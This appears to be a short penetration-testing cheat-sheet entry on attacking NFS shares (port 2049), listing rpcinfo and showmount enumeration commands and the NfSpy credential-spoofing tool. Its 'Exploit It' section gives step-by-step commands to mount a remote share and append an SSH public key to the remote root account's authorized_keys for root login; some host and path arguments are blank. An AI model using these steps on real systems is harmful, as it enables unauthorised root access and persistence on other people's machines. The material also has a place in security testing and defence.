NFS (2049)

In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share, I’ll have access as that same uid and gid on the remote system, regardless of what username is assigned to it, this includes root.


root@box:~# rpcinfo -p
# All Mount Points
root@box:~# showmount -a
# Export List
root@box:~# showmount -e
# Directories
root@box:~# showmount -d
# Hosts
root@box:~# showmount

Exploit It

root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs /tmp/r00t/
root@box:~# cat ~/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh root@

Configuration Files

  • /etc/exports
  • /etc/lib/nfs/xtab


NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.
  • nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.